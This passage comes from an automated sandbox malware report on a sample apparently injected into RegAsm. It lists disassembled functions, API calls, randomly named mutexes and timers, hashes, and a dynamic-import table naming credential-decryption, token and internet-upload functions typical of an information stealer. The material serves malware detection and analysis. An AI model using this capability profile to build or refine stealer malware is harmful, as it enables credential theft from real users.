                                                                • Opcode Fuzzy Hash: 74752e9a6074b5a3a81f59100e89eb1074740e7a5a2e13c8a376f63f6251df2b
                                                                • Instruction Fuzzy Hash: E0816071A00609EBDB14DFA4DC89EEE7B75FB88310F108129FA15A7290D778A911CB98
                                                                Function 0040CF9A Relevance: 13.6, APIs: 9, Instructions: 131stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • lstrcpyn.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,0040D74E,?,?), ref: 0040D006
                                                                • lstrcpyn.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,0040D74E,?,?), ref: 0040D046
                                                                • lstrcpyn.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,0040D74E,?,?), ref: 0040D086
                                                                • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0040D74E,?,?,?,?), ref: 0040D090
                                                                  • Part of subcall function 0040ED79: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_t2lry32w), ref: 0040ED9D
                                                                  • Part of subcall function 0040ED79: CancelWaitableTimer.KERNEL32(00000000), ref: 0040EDA4
                                                                  • Part of subcall function 0040ED79: CreateMutexA.KERNEL32(00000000,00000000,MTX9of20kmn), ref: 0040EDB1
                                                                  • Part of subcall function 0040ED79: OutputDebugStringA.KERNELBASE(t6xplss11), ref: 0040EDCE
                                                                  • Part of subcall function 0040ED79: ReleaseMutex.KERNEL32(00000000), ref: 0040EDD1
                                                                  • Part of subcall function 0040ED79: RegOpenKeyExA.KERNEL32(80000001,regp7r1ymid,00000000,00020019,?), ref: 0040EDED
                                                                  • Part of subcall function 0040ED79: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_7pn5tvkk), ref: 0040EE0A
                                                                  • Part of subcall function 0040ED79: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040EE14
                                                                  • Part of subcall function 0040ED79: RegOpenKeyExA.KERNEL32(80000001,regd0052drm,00000000,00020019,?), ref: 0040EE32
                                                                  • Part of subcall function 0040ED79: LocalAlloc.KERNEL32(00000000,00000914), ref: 0040EE3A
                                                                  • Part of subcall function 0040ED79: RegOpenKeyExA.KERNEL32(80000001,regou0dc9en,00000000,00020019,00409D4B), ref: 0040EE57
                                                                  • Part of subcall function 0040ED79: LocalFree.KERNEL32(00000000), ref: 0040EE5A
                                                                  • Part of subcall function 0040ED79: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLk6eld4rr), ref: 0040EE6B
                                                                  • Part of subcall function 0040ED79: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040EE75
                                                                  • Part of subcall function 0040ED79: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_gc0upe3h), ref: 0040EE84
                                                                  • Part of subcall function 0040ED79: SetEvent.KERNEL32(00000000), ref: 0040EE8D
                                                                  • Part of subcall function 0040ED79: ResetEvent.KERNEL32(00000000), ref: 0040EE94
                                                                  • Part of subcall function 0040ED79: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_mn0c9pqk), ref: 0040EEA3
                                                                  • Part of subcall function 0040ED79: GetLastError.KERNEL32 ref: 0040EEAB
                                                                • wsprintfW.USER32 ref: 0040D0AE
                                                                  • Part of subcall function 0040F012: lstrlenW.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F02F
                                                                  • Part of subcall function 0040F012: lstrlenW.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F034
                                                                  • Part of subcall function 0040F012: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,74DF2F20), ref: 0040F04D
                                                                  • Part of subcall function 0040F012: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000A28,00000000,?,?,00000000,?,74DF2F20), ref: 0040F06C
                                                                  • Part of subcall function 0040F012: FindCloseChangeNotification.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F073
                                                                  • Part of subcall function 0040F012: LocalAlloc.KERNEL32(00000000,000005DD,?,00000000,?,74DF2F20), ref: 0040F07F
                                                                  • Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F08D
                                                                  • Part of subcall function 0040F012: LocalFree.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F090
                                                                  • Part of subcall function 0040F012: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_pg3esy2g), ref: 0040F09E
                                                                  • Part of subcall function 0040F012: CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F0A5
                                                                  • Part of subcall function 0040F012: OutputDebugStringA.KERNELBASE(t26t01mzg,?,00000000,?,74DF2F20), ref: 0040F0B6
                                                                  • Part of subcall function 0040F012: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_n39w6qzp,?,00000000,?,74DF2F20), ref: 0040F0C3
                                                                  • Part of subcall function 0040F012: SetEvent.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F0CC
                                                                  • Part of subcall function 0040F012: ResetEvent.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F0D3
                                                                  • Part of subcall function 0040F012: CreateMutexA.KERNEL32(00000000,00000000,MTXid6eg7kl,?,00000000,?,74DF2F20), ref: 0040F0E2
                                                                  • Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(kswx2kex,87xo3fjd,?,00000000,?,74DF2F20), ref: 0040F0FF
                                                                  • Part of subcall function 0040F012: ReleaseMutex.KERNEL32(?,?,00000000,?,74DF2F20), ref: 0040F104
                                                                  • Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(mjtppkej,54dhluqg,?,00000000,?,74DF2F20), ref: 0040F114
                                                                  • Part of subcall function 0040F012: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_b67hznar), ref: 0040F131
                                                                  • Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F139
                                                                  • Part of subcall function 0040F012: CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F140
                                                                  • Part of subcall function 0040F012: OutputDebugStringA.KERNEL32(t7fwgbo5x,?,00000000,?,74DF2F20), ref: 0040F14B
                                                                • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040D74E), ref: 0040D0C6
                                                                • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040D74E), ref: 0040D0CD
                                                                • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0040D74E,?,?,?,?), ref: 0040D0DC
                                                                • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0040D74E,?,?,?,?), ref: 0040D0E6
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Create$Local$TimerWaitable$EventFree$MutexReleaseSemaphore$AllocCancelDebugErrorLastOpenOutputStringlstrcpyn$EnvironmentResetVariablelstrlen$ChangeCloseFileFindInfoMappingNotificationSystemwsprintf
                                                                • String ID:
                                                                • API String ID: 3888302672-0
                                                                • Opcode ID: 195e40cd37d588f0c9ce79963e98a326ec194cc03237b27264ae4bdb7f70d6ac
                                                                • Instruction ID: 0e3cd42aa164bcabc9caf85d428569b4861fa6abbfc3e93494755244ccdf25f0
                                                                • Opcode Fuzzy Hash: 195e40cd37d588f0c9ce79963e98a326ec194cc03237b27264ae4bdb7f70d6ac
                                                                • Instruction Fuzzy Hash: C9414EB5A00215EFDB048FA8DCC49EEBBB8FB8C354B04C17AAD09E7351D6349D058BA4
                                                                Function 0040194A Relevance: 10.6, APIs: 7, Instructions: 124fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 004019A0
                                                                • PathCombineW.SHLWAPI(00000000,?,?), ref: 004019EE
                                                                • LocalFree.KERNEL32(00000000), ref: 00401A52
                                                                • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00401AB4
                                                                • FindClose.KERNEL32(00000000), ref: 00401ABF
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Find$File$CloseCombineFirstFreeLocalNextPath
                                                                • String ID:
                                                                • API String ID: 3818457336-0
                                                                • Opcode ID: 06901c5958fca1620446a1cd0bfba972ce5f872ba30bdc8197b2a1ab6636e2a4
                                                                • Instruction ID: f745face614c6c1a8a5a67c572eeaf69f029bf43ee1742b80752fb9b6614aa13
                                                                • Opcode Fuzzy Hash: 06901c5958fca1620446a1cd0bfba972ce5f872ba30bdc8197b2a1ab6636e2a4
                                                                • Instruction Fuzzy Hash: 6B41D971A00614FFCB11DBA0DC94FEA3778EB89300F00416AFA15A32A0DB399E41CF68
                                                                Function 004017B3 Relevance: 9.1, APIs: 6, Instructions: 130fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FindFirstFileW.KERNEL32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0040180B
                                                                • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 00401855
                                                                • LocalFree.KERNEL32(00000000), ref: 00401875
                                                                • FindNextFileW.KERNELBASE(00000000,00000010), ref: 0040188C
                                                                • FindClose.KERNEL32(00000000), ref: 00401893
                                                                • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 004018E9
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Find$CombineFilePath$CloseFirstFreeLocalNext
                                                                • String ID:
                                                                • API String ID: 1203334675-0
                                                                • Opcode ID: f065be6deb161802adf57f14a16e04d664835443840dbbab4fdff17d63303c86
                                                                • Instruction ID: 31931e9bd7c547a40b3fc9a1945ad9982713256a1c407e0db2e75d707077ff5d
                                                                • Opcode Fuzzy Hash: f065be6deb161802adf57f14a16e04d664835443840dbbab4fdff17d63303c86
                                                                • Instruction Fuzzy Hash: E741BB72900615EBCB11AB94DC94FEB3778EB88300F008179FA05A32A0DB35DF45CB58
                                                                Function 004103E1 Relevance: 7.7, APIs: 6, Instructions: 188COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LocalFree.KERNEL32(00000000), ref: 00410422
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FreeLocal
                                                                • String ID:
                                                                • API String ID: 2826327444-0
                                                                • Opcode ID: 6ef91dc86e56cd751b865bde49f83430b486febcc5cf93ba2722e22d5e197c7b
                                                                • Instruction ID: d7ede38217a45fab54ca4531d21abc7ee53ee079bb872f7ad9e23168f097edcf
                                                                • Opcode Fuzzy Hash: 6ef91dc86e56cd751b865bde49f83430b486febcc5cf93ba2722e22d5e197c7b
                                                                • Instruction Fuzzy Hash: DC5163B1E00215EFDB04DBA5DC45EFF7BB9EF89310F10812AE915E7290DA749D418BA8
                                                                Function 00408109 Relevance: 7.6, APIs: 5, Instructions: 103fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FindFirstFileW.KERNEL32(?,?,?,?,?,74E04B60,?,74DE9350), ref: 00408161
                                                                • PathCombineW.SHLWAPI(00000000,?,?), ref: 004081A8
                                                                • LocalFree.KERNEL32(00000000), ref: 004081C5
                                                                • FindNextFileW.KERNELBASE(00000000,00000010), ref: 004081DB
                                                                • FindClose.KERNEL32(00000000), ref: 004081E2
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Find$File$CloseCombineFirstFreeLocalNextPath
                                                                • String ID:
                                                                • API String ID: 3818457336-0
                                                                • Opcode ID: 8552d81e6a67203dc6d3b196499487720c62a77f593940b84288c9dbb09770b0
                                                                • Instruction ID: d09d80c2cc478856dc91d913c3842ef17c9ea8639595d1a3156bd9367906e863
                                                                • Opcode Fuzzy Hash: 8552d81e6a67203dc6d3b196499487720c62a77f593940b84288c9dbb09770b0
                                                                • Instruction Fuzzy Hash: DE310775500218EFCB119B64DD84EEE7779FF98304F0041AAF945A7290EF389E42CB68
                                                                Function 0040CD2D Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetUserDefaultLCID.KERNEL32(00001001,00000000,00000104,?,0040D72A,?), ref: 0040CD65
                                                                • GetLocaleInfoW.KERNEL32(00000000,?,0040D72A,?), ref: 0040CD6C
                                                                • wsprintfW.USER32 ref: 0040CD76
                                                                  • Part of subcall function 0040F012: lstrlenW.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F02F
                                                                  • Part of subcall function 0040F012: lstrlenW.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F034
                                                                  • Part of subcall function 0040F012: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,74DF2F20), ref: 0040F04D
                                                                  • Part of subcall function 0040F012: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000A28,00000000,?,?,00000000,?,74DF2F20), ref: 0040F06C
                                                                  • Part of subcall function 0040F012: FindCloseChangeNotification.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F073
                                                                  • Part of subcall function 0040F012: LocalAlloc.KERNEL32(00000000,000005DD,?,00000000,?,74DF2F20), ref: 0040F07F
                                                                  • Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F08D
                                                                  • Part of subcall function 0040F012: LocalFree.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F090
                                                                  • Part of subcall function 0040F012: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_pg3esy2g), ref: 0040F09E
                                                                  • Part of subcall function 0040F012: CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F0A5
                                                                  • Part of subcall function 0040F012: OutputDebugStringA.KERNELBASE(t26t01mzg,?,00000000,?,74DF2F20), ref: 0040F0B6
                                                                  • Part of subcall function 0040F012: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_n39w6qzp,?,00000000,?,74DF2F20), ref: 0040F0C3
                                                                  • Part of subcall function 0040F012: SetEvent.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F0CC
                                                                  • Part of subcall function 0040F012: ResetEvent.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F0D3
                                                                  • Part of subcall function 0040F012: CreateMutexA.KERNEL32(00000000,00000000,MTXid6eg7kl,?,00000000,?,74DF2F20), ref: 0040F0E2
                                                                  • Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(kswx2kex,87xo3fjd,?,00000000,?,74DF2F20), ref: 0040F0FF
                                                                  • Part of subcall function 0040F012: ReleaseMutex.KERNEL32(?,?,00000000,?,74DF2F20), ref: 0040F104
                                                                  • Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(mjtppkej,54dhluqg,?,00000000,?,74DF2F20), ref: 0040F114
                                                                  • Part of subcall function 0040F012: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_b67hznar), ref: 0040F131
                                                                  • Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F139
                                                                  • Part of subcall function 0040F012: CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F140
                                                                  • Part of subcall function 0040F012: OutputDebugStringA.KERNEL32(t7fwgbo5x,?,00000000,?,74DF2F20), ref: 0040F14B
                                                                • LocalFree.KERNEL32(00000000), ref: 0040CD8E
                                                                • LocalFree.KERNEL32(00000000), ref: 0040CD95
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateLocal$TimerWaitable$EventFree$AllocCancelDebugEnvironmentErrorLastMutexOutputStringVariablelstrlen$ChangeCloseDefaultFileFindInfoLocaleMappingNotificationReleaseResetUserwsprintf
                                                                • String ID:
                                                                • API String ID: 2029699020-0
                                                                • Opcode ID: 6bfe1b7bbcd659b84170e2e7152a989819294786f7df45f4198ce4522c44120c
                                                                • Instruction ID: 3659a6e73a7a7ca86283462a1e3c1019b3c6bd7b03ff75b1d1c0116eb8287abb
                                                                • Opcode Fuzzy Hash: 6bfe1b7bbcd659b84170e2e7152a989819294786f7df45f4198ce4522c44120c
                                                                • Instruction Fuzzy Hash: 31F04F72640604EFE3009BE5EC49EEA7BA9FBCC754F008035FB49D7291DA745C0086A8
                                                                Function 0040CE65 Relevance: 4.5, APIs: 3, Instructions: 39timeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetTimeZoneInformation.KERNEL32(?,-00000014,74DF0460), ref: 0040CE77
                                                                • wsprintfW.USER32 ref: 0040CEA8
                                                                  • Part of subcall function 0040F012: lstrlenW.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F02F
                                                                  • Part of subcall function 0040F012: lstrlenW.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F034
                                                                  • Part of subcall function 0040F012: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,74DF2F20), ref: 0040F04D
                                                                  • Part of subcall function 0040F012: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000A28,00000000,?,?,00000000,?,74DF2F20), ref: 0040F06C
                                                                  • Part of subcall function 0040F012: FindCloseChangeNotification.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F073
                                                                  • Part of subcall function 0040F012: LocalAlloc.KERNEL32(00000000,000005DD,?,00000000,?,74DF2F20), ref: 0040F07F
                                                                  • Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F08D
                                                                  • Part of subcall function 0040F012: LocalFree.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F090
                                                                  • Part of subcall function 0040F012: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_pg3esy2g), ref: 0040F09E
                                                                  • Part of subcall function 0040F012: CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F0A5
                                                                  • Part of subcall function 0040F012: OutputDebugStringA.KERNELBASE(t26t01mzg,?,00000000,?,74DF2F20), ref: 0040F0B6
                                                                  • Part of subcall function 0040F012: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_n39w6qzp,?,00000000,?,74DF2F20), ref: 0040F0C3
                                                                  • Part of subcall function 0040F012: SetEvent.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F0CC
                                                                  • Part of subcall function 0040F012: ResetEvent.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F0D3
                                                                  • Part of subcall function 0040F012: CreateMutexA.KERNEL32(00000000,00000000,MTXid6eg7kl,?,00000000,?,74DF2F20), ref: 0040F0E2
                                                                  • Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(kswx2kex,87xo3fjd,?,00000000,?,74DF2F20), ref: 0040F0FF
                                                                  • Part of subcall function 0040F012: ReleaseMutex.KERNEL32(?,?,00000000,?,74DF2F20), ref: 0040F104
                                                                  • Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(mjtppkej,54dhluqg,?,00000000,?,74DF2F20), ref: 0040F114
                                                                  • Part of subcall function 0040F012: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_b67hznar), ref: 0040F131
                                                                  • Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F139
                                                                  • Part of subcall function 0040F012: CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F140
                                                                  • Part of subcall function 0040F012: OutputDebugStringA.KERNEL32(t7fwgbo5x,?,00000000,?,74DF2F20), ref: 0040F14B
                                                                • LocalFree.KERNEL32(00000000), ref: 0040CEC0
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Create$LocalTimerWaitable$Event$AllocCancelDebugEnvironmentErrorFreeLastMutexOutputStringVariablelstrlen$ChangeCloseFileFindInformationMappingNotificationReleaseResetTimeZonewsprintf
                                                                • String ID:
                                                                • API String ID: 1079054603-0
                                                                • Opcode ID: 3e0b6e95576d9cf75a757fdfefe4ae9e91229805e5ab5f35eef809e13537485d
                                                                • Instruction ID: 5b0d0e73e1226a1d48c5652217f1ff514faf40f860b290d3e6735eacab86365f
                                                                • Opcode Fuzzy Hash: 3e0b6e95576d9cf75a757fdfefe4ae9e91229805e5ab5f35eef809e13537485d
                                                                • Instruction Fuzzy Hash: 9AF06271600600EFE710ABA8EC09BEBBBF9FFC8714F008439EA06D7151D67499018A95
                                                                Function 0040F75C Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetUserNameW.ADVAPI32(00000000,00000101), ref: 0040F77D
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: NameUser
                                                                • String ID:
                                                                • API String ID: 2645101109-0
                                                                • Opcode ID: 08cf979ebd00a15239af198ff7f342cfe0d522d9cb4e190fcbc85bbecc828234
                                                                • Instruction ID: a61f80a832611778e7cd8e7972bbe72dccd38ef68115f5f73051dee31061c24a
                                                                • Opcode Fuzzy Hash: 08cf979ebd00a15239af198ff7f342cfe0d522d9cb4e190fcbc85bbecc828234
                                                                • Instruction Fuzzy Hash: F0D05E72600218FBD70097C8DC09ECE7AECEB48750F004061F605E3281D6B49E0087E8
                                                                Function 00401000 Relevance: 392.5, APIs: 112, Strings: 112, Instructions: 451libraryloaderCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • LoadLibraryA.KERNEL32(kernel32.dll,74DE9350,74DE7CD0,?,?,?,00409C55), ref: 00401012
                                                                • GetProcAddress.KERNEL32(00000000,LoadLibraryW), ref: 0040102F
                                                                • GetProcAddress.KERNEL32(00000000,GetUserDefaultLocaleName), ref: 0040103C
                                                                • GetProcAddress.KERNEL32(00000000,GetEnvironmentVariableW), ref: 00401044
                                                                • GetProcAddress.KERNEL32(00000000,lstrlenA), ref: 00401051
                                                                • GetProcAddress.KERNEL32(00000000,FreeLibrary), ref: 0040105E
                                                                • GetProcAddress.KERNEL32(00000000,GlobalFree), ref: 0040106B
                                                                • GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 00401078
                                                                • GetProcAddress.KERNEL32(00000000,GetTimeZoneInformation), ref: 00401085
                                                                • GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00401092
                                                                • GetProcAddress.KERNEL32(00000000,lstrcpyA), ref: 0040109F
                                                                • GetProcAddress.KERNEL32(00000000,ReadFile), ref: 004010AC
                                                                • GetProcAddress.KERNEL32(00000000,lstrlenW), ref: 004010B9
                                                                • GetProcAddress.KERNEL32(00000000,WriteFile), ref: 004010C6
                                                                • GetProcAddress.KERNEL32(00000000,SetCurrentDirectoryW), ref: 004010D3
                                                                • GetProcAddress.KERNEL32(00000000,lstrcmpW), ref: 004010E0
                                                                • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 004010ED
                                                                • GetProcAddress.KERNEL32(00000000,GetLastError), ref: 004010FA
                                                                • GetProcAddress.KERNEL32(00000000,FindNextFileW), ref: 00401107
                                                                • GetProcAddress.KERNEL32(00000000,FindFirstFileW), ref: 00401114
                                                                • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00401121
                                                                • GetProcAddress.KERNEL32(00000000,GetFileSize), ref: 0040112E
                                                                • GetProcAddress.KERNEL32(00000000,OpenMutexW), ref: 0040113B
                                                                • GetProcAddress.KERNEL32(00000000,WideCharToMultiByte), ref: 00401148
                                                                • GetProcAddress.KERNEL32(00000000,GlobalAlloc), ref: 00401155
                                                                • GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 00401162
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressProc$LibraryLoad
                                                                • String ID: Advapi32.dll$Bcrypt.dll$CharUpperW$CloseHandle$CoCreateInstance$CoInitialize$ConvertSidToStringSidW$CopyFileW$CreateFileW$CreateMutexW$CreateProcessWithTokenW$CreateToolhelp32Snapshot$Crypt32.dll$CryptBinaryToStringW$CryptStringToBinaryA$CryptStringToBinaryW$CryptUnprotectData$DeleteFileW$DuplicateTokenEx$EnumDisplayDevicesW$ExitProcess$FindClose$FindFirstFileW$FindNextFileW$FreeLibrary$GetClientRect$GetCurrentProcess$GetDC$GetDesktopWindow$GetDriveTypeW$GetEnvironmentVariableW$GetFileSize$GetLastError$GetLocaleInfoW$GetLogicalDriveStringsW$GetModuleFileNameW$GetProcAddress$GetSystemInfo$GetSystemMetrics$GetSystemWow64DirectoryW$GetTimeZoneInformation$GetTokenInformation$GetUserDefaultLCID$GetUserDefaultLocaleName$GetUserNameW$GlobalAlloc$GlobalFree$GlobalMemoryStatusEx$HeapFree$HttpOpenRequestW$HttpQueryInfoA$HttpQueryInfoW$HttpSendRequestW$InternetCloseHandle$InternetConnectW$InternetOpenUrlA$InternetOpenUrlW$InternetOpenW$InternetReadFile$InternetReadFileExW$InternetSetOptionW$LoadLibraryW$LocalAlloc$LocalFree$MultiByteToWideChar$Ole32.dll$OpenMutexW$OpenProcess$OpenProcessToken$PathCombineW$PathMatchSpecW$Process32First$Process32FirstW$Process32Next$Process32NextW$ReadFile$RegCloseKey$RegEnumKeyExW$RegOpenKeyExW$RegQueryValueExW$ReleaseDC$SHGetFolderPathW$SHGetSpecialFolderPathW$SetCurrentDirectoryW$SetEnvironmentVariableW$Shell32.dll$ShellExecuteW$Shlwapi.dll$Sleep$StrCpyW$StrRChrW$StrStrA$StrStrIW$StrStrW$StrToInt64ExW$StrToIntA$StrToIntW$SystemFunction036$TerminateProcess$User32.dll$WideCharToMultiByte$WinInet.dll$WriteFile$kernel32.dll$lstrcmpA$lstrcmpW$lstrcmpiW$lstrcpyA$lstrcpynA$lstrlenA$lstrlenW$wsprintfW
                                                                • API String ID: 2238633743-1109507645
                                                                • Opcode ID: b080fed737f4aee8b3a7a30e91387e2ec329667af4fa8eb9765b117f2ab5de35
                                                                • Instruction ID: 10b7ca4a53547034c89637a339416f9ad75de324a14711a5cd4a76be5222908f
                                                                • Opcode Fuzzy Hash: b080fed737f4aee8b3a7a30e91387e2ec329667af4fa8eb9765b117f2ab5de35
                                                                • Instruction Fuzzy Hash: 6ED1C074D91754FE97006FB5AC89FDA7EE8ED4DB943208527B204E3170D6BC89808BAC
                                                                Function 0040AF5D Relevance: 121.1, APIs: 49, Strings: 20, Instructions: 383networktimeregistryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
